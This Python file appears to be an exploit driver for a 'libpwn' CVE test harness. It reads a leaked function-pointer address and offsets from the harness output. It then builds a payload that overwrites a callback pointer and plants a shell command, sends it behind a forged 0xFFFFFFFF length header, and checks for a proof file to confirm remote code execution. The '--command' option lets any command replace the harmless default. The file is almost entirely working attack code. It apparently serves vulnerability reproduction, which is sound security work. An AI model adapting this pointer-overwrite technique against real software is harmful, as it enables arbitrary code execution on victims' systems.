132 lines
3.7 KiB
Python
132 lines
3.7 KiB
Python
#!/usr/bin/env python3
|
|
import argparse
|
|
import os
|
|
import re
|
|
import struct
|
|
import subprocess
|
|
import sys
|
|
from pathlib import Path
|
|
|
|
|
|
# Value that build_wire() packs as the first big-endian 32-bit field of the
# wire header, ahead of the real payload length.
PACKET_LENGTH = 0xFFFFFFFF
|
|
|
|
|
|
def repo_root():
    """Return the parent of the directory that contains this script.

    The script path is resolved to an absolute path before walking upwards.
    """
    script_dir = Path(__file__).resolve().parent
    return script_dir.parent
|
|
|
|
|
|
def default_harness_path():
    """Return the default harness binary path, located next to this script.

    The file name gets an ".exe" extension when os.name is "nt" and no
    extension otherwise.
    """
    script_dir = Path(__file__).resolve().parent
    extension = "" if os.name != "nt" else ".exe"
    return script_dir / ("libpwn_local_rce_harness" + extension)
|
|
|
|
|
|
def default_proof_path():
    """Return the default proof-file path, located next to this script."""
    script_dir = Path(__file__).resolve().parent
    return script_dir.joinpath("libpwn_rce_proof.txt")
|
|
|
|
|
|
def default_command(proof_path):
    """Return the default command string that writes the marker to proof_path.

    A ``cmd /c`` form is produced when os.name is "nt"; otherwise a
    ``/bin/sh -c`` form is produced.

    Args:
        proof_path: Destination of the marker file. It is interpolated into
            the command verbatim, with no quoting or escaping applied.

    Returns:
        The command line as a single string.
    """
    marker = "libpwn-rce-verified"
    on_windows = os.name == "nt"
    if not on_windows:
        return f"/bin/sh -c 'echo {marker} > {proof_path}'"
    return f"cmd /c echo {marker}>{proof_path}"
|
|
|
|
|
|
def parse_leak(line):
    """Extract the layout fields from the line printed by the harness.

    The line must contain, in this order and separated by whitespace,
    ``exec_callback=<hex>`` (with or without a ``0x`` prefix) followed by
    the decimal fields ``callback_offset=``, ``command_offset=`` and
    ``ptr_size=``. Text before or after that run is ignored.

    Args:
        line: Text to search.

    Returns:
        A dict with integer values under the keys "exec_callback",
        "callback_offset", "command_offset" and "ptr_size".

    Raises:
        ValueError: If the expected fields are not found in line.
    """
    leak_regex = (
        r"exec_callback=(0x[0-9a-fA-F]+|[0-9a-fA-F]+)\s+"
        r"callback_offset=(\d+)\s+"
        r"command_offset=(\d+)\s+"
        r"ptr_size=(\d+)"
    )
    found = re.search(leak_regex, line)
    if found is None:
        raise ValueError(f"could not parse leak line: {line!r}")

    address_text, callback_text, command_text, size_text = found.groups()
    return {
        # int(..., 16) accepts the address both with and without "0x".
        "exec_callback": int(address_text, 16),
        "callback_offset": int(callback_text),
        "command_offset": int(command_text),
        "ptr_size": int(size_text),
    }
|
|
|
|
|
|
def pack_ptr(value, ptr_size):
    """Encode value as a little-endian unsigned integer of ptr_size bytes.

    Args:
        value: Integer to encode.
        ptr_size: Width in bytes; only 4 and 8 are supported.

    Returns:
        The packed bytes.

    Raises:
        ValueError: If ptr_size is neither 4 nor 8.
    """
    if ptr_size == 8:
        layout = "<Q"
    elif ptr_size == 4:
        layout = "<I"
    else:
        raise ValueError(f"unsupported pointer size {ptr_size}")
    return struct.pack(layout, value)
|
|
|
|
|
|
def build_payload(leak, command):
    """Lay out the pointer and the NUL-terminated command in one buffer.

    The buffer is filled with b"A", then the packed ``exec_callback`` value
    is written at ``callback_offset`` and the encoded command (plus a
    trailing NUL byte) is written at ``command_offset``. The command is
    written last, so it wins if the two regions overlap.

    Args:
        leak: Dict with the integer keys "exec_callback", "callback_offset",
            "command_offset" and "ptr_size", as returned by parse_leak().
        command: Command text; encoded with str.encode() defaults.

    Returns:
        The assembled payload as bytes.

    Raises:
        ValueError: Propagated from pack_ptr() for an unsupported ptr_size.
    """
    command_bytes = command.encode() + b"\x00"

    callback_start = leak["callback_offset"]
    callback_end = callback_start + leak["ptr_size"]
    command_start = leak["command_offset"]
    command_end = command_start + len(command_bytes)

    pointer_bytes = pack_ptr(leak["exec_callback"], leak["ptr_size"])

    # Size the buffer for whichever region ends last. Sizing it from the
    # command region alone is wrong when the callback slot starts beyond
    # the command's end: a slice assignment past the end of a bytearray is
    # clamped, so the pointer would be appended at the wrong offset.
    payload = bytearray(b"A" * max(callback_end, command_end))
    payload[callback_start:callback_end] = pointer_bytes
    payload[command_start:command_end] = command_bytes
    return bytes(payload)
|
|
|
|
|
|
def build_wire(payload):
    """Prefix payload with an 8-byte header and return the combined bytes.

    The header is two big-endian unsigned 32-bit fields: PACKET_LENGTH
    first, then the actual length of payload.
    """
    declared_field = struct.pack(">I", PACKET_LENGTH)
    actual_field = struct.pack(">I", len(payload))
    return declared_field + actual_field + payload
|
|
|
|
|
|
def run_exploit(args):
    """Run the harness once, feed it the payload, and verify the proof file.

    Steps: delete any stale proof file, start the harness with piped
    stdin/stdout (stderr merged into stdout), read and parse its first
    output line, send the framed payload, collect the remaining output,
    then check the exit code and the proof file contents.

    Args:
        args: Namespace with the attributes ``harness`` (path to the
            binary), ``proof`` (path of the proof file), ``command``
            (command string; an empty value selects default_command())
            and ``timeout`` (seconds allowed for the whole exchange).

    Raises:
        subprocess.TimeoutExpired: If the harness is still running when
            the timeout elapses; it is killed first.
        ValueError: If the first output line cannot be parsed or the
            reported pointer size is unsupported.
        SystemExit: If the harness exits non-zero, or the proof file is
            missing or lacks the expected marker.
    """
    import threading  # local import: only the watchdog below needs it

    harness = Path(args.harness).resolve()
    proof = Path(args.proof).resolve()

    # EAFP instead of exists()+unlink(): no window between check and delete.
    try:
        proof.unlink()
    except FileNotFoundError:
        pass

    timed_out = threading.Event()

    # The context manager closes the pipes and reaps the child on every
    # path, including errors, so no zombie or open descriptor is left.
    with subprocess.Popen(
        [str(harness)],
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        cwd=str(repo_root()),
        text=False,
    ) as proc:

        def kill_on_timeout():
            # Only flag a timeout if the child is really still running.
            if proc.poll() is None:
                timed_out.set()
                proc.kill()

        # readline()/read() on the pipes have no timeout of their own, so a
        # watchdog bounds the whole exchange; killing the child unblocks them.
        watchdog = threading.Timer(args.timeout, kill_on_timeout)
        watchdog.daemon = True
        watchdog.start()
        try:
            leak_line = proc.stdout.readline().decode(errors="replace").strip()
            leak = parse_leak(leak_line)
            command = args.command or default_command(proof)
            payload = build_payload(leak, command)
            wire = build_wire(payload)
            proc.stdin.write(wire)
            proc.stdin.close()
            output = proc.stdout.read().decode(errors="replace")
            rc = proc.wait()
        except (ValueError, OSError) as exc:
            # A kill by the watchdog shows up as an empty leak line or a
            # broken pipe; report the real cause instead.
            if timed_out.is_set():
                raise subprocess.TimeoutExpired(proc.args, args.timeout) from exc
            raise
        finally:
            watchdog.cancel()
            if proc.poll() is None:
                proc.kill()

    if timed_out.is_set():
        raise subprocess.TimeoutExpired(proc.args, args.timeout)

    print(leak_line)
    print(output, end="")
    print(f"process_rc={rc}")
    print(f"payload_len={len(payload)}")
    print(f"proof_path={proof}")

    if rc != 0:
        raise SystemExit("FAIL: harness exited non-zero")
    if not proof.exists():
        raise SystemExit("FAIL: proof file was not created")
    proof_text = proof.read_text(errors="replace").strip()
    if "libpwn-rce-verified" not in proof_text:
        raise SystemExit(f"FAIL: unexpected proof file content: {proof_text!r}")
    print("RCE_PROOF=PASS")
|
|
|
|
|
|
def main():
    """Parse the command-line options and pass them to run_exploit().

    Options: --harness and --proof (paths, defaulting to files next to this
    script), --command (defaults to an empty string) and --timeout (float
    seconds, default 10.0).
    """
    cli = argparse.ArgumentParser(
        description="Local RCE proof driver for the libpwn CVE harness."
    )
    option_specs = (
        ("--harness", {"default": str(default_harness_path())}),
        ("--proof", {"default": str(default_proof_path())}),
        ("--command", {"default": ""}),
        ("--timeout", {"type": float, "default": 10.0}),
    )
    for flag, settings in option_specs:
        cli.add_argument(flag, **settings)

    options = cli.parse_args()
    run_exploit(options)
|
|
|
|
|
|
# Run the driver only when this file is executed as a script, not on import.
if __name__ == "__main__":
    main()
|